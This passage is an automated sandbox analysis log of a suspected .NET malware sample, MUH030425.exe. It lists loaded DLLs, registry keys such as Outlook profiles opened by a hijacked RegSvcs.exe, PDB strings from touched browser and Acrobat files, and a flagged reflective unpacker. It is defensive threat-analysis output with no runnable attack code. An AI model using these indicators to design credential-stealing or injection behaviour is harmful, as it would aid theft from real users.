              Source: C:\Windows\System32\AgentService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
              Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
              Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
              Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
              Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\vds.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\vds.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\vds.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\vds.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\vds.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\vds.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
              Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
              Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
              Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
              Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
              Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbengine.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\MUH030425.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\MUH030425.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: MUH030425.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: MUH030425.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: MUH030425.exeStatic file information: File size 1656320 > 1048576
              Source: MUH030425.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x18be00
              Source: MUH030425.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: MUH030425.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe1.13.dr
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: plugin-container.pdb source: alg.exe, 0000000D.00000003.2202633741.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.13.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pingsender.pdb source: alg.exe, 0000000D.00000003.2182345698.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe1.13.dr
              Source: Binary string: firefox.pdb source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: firefox.pdbP source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: alg.exe, 0000000D.00000003.1947973037.0000000001480000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb.> source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb source: ssvagent.exe.13.dr
              Source: Binary string: minidump-analyzer.pdb source: alg.exe, 0000000D.00000003.2157918575.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.8.dr
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb4 source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: crashreporter.pdb source: alg.exe, 0000000D.00000003.2059367986.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdb source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000000D.00000003.1696706041.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdb source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000000D.00000003.1838763806.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1839825345.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1846357220.0000000001530000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: ucrtbase.pdbUGP source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mavinject32.pdb source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdb source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 0000000D.00000003.1781474310.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb source: Common.ShowHelp.exe.13.dr
              Source: Binary string: System.Drawing.pdb( source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000000D.00000003.1770420067.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: private_browsing.pdbp source: alg.exe, 0000000D.00000003.2212108302.0000000000670000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000000D.00000003.1794989425.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 0000000D.00000003.1774099876.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 0000000D.00000003.1790232245.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdbD(L source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\ssvagent\obj\ssvagent.pdb<<7 source: ssvagent.exe.13.dr
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pixuBt.pdbSHA256 source: MUH030425.exe, WER4A31.tmp.dmp.18.dr
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: locator.pdbGCTL source: Locator.exe.8.dr
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: default-browser-agent.pdb source: alg.exe, 0000000D.00000003.2095519854.0000000000400000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: updater.pdb source: alg.exe, 0000000D.00000003.2233883361.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000000D.00000003.1859682808.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 0000000D.00000003.1747818920.0000000001650000.00000004.00001000.00020000.00000000.sdmp, Eula.exe.13.dr
              Source: Binary string: System.Xml.pdb@\ source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER4A31.tmp.dmp.18.dr

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: 0.2.MUH030425.exe.50f0000.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: alg.exe.8.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,8_2_0040B15C
              Source: AcroCEF.exe.8.drStatic PE information: section name: .didat
              Source: AcroCEF.exe.8.drStatic PE information: section name: _RDATA
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: section name: .didat
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: section name: _RDATA
              Source: armsvc.exe.8.drStatic PE information: section name: .didat
              Source: alg.exe.8.drStatic PE information: section name: .didat
              Source: FXSSVC.exe.8.drStatic PE information: section name: .didat
              Source: elevation_service.exe.8.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe.8.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe.8.drStatic PE information: section name: .retplne
              Source: elevation_service.exe.8.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe.8.drStatic PE information: section name: malloc_h
              Source: elevation_service.exe0.8.drStatic PE information: section name: .00cfg
              Source: elevation_service.exe0.8.drStatic PE information: section name: .gxfg
              Source: elevation_service.exe0.8.drStatic PE information: section name: .retplne
              Source: elevation_service.exe0.8.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe0.8.drStatic PE information: section name: malloc_h
              Source: maintenanceservice.exe.8.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe.8.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe.8.drStatic PE information: section name: _RDATA
              Source: msdtc.exe.8.drStatic PE information: section name: .didat
              Source: msiexec.exe.8.drStatic PE information: section name: .didat
              Source: MsSense.exe.8.drStatic PE information: section name: .didat
              Source: Spectrum.exe.8.drStatic PE information: section name: .didat
              Source: TieringEngineService.exe.8.drStatic PE information: section name: .didat
              Source: vds.exe.8.drStatic PE information: section name: .didat
              Source: VSSVC.exe.8.drStatic PE information: section name: .didat
              Source: WmiApSrv.exe.8.drStatic PE information: section name: .didat
              Source: msvcp140.dll.8.drStatic PE information: section name: .didat
              Source: wmpnetwk.exe.8.drStatic PE information: section name: .didat
              Source: SearchIndexer.exe.8.drStatic PE information: section name: .didat
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D86E push 0040D89Ch; ret 8_2_0040D894
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D870 push 0040D89Ch; ret 8_2_0040D894
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004140C0 push 004140ECh; ret 8_2_004140E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004108C8 push 004108F4h; ret 8_2_004108EC
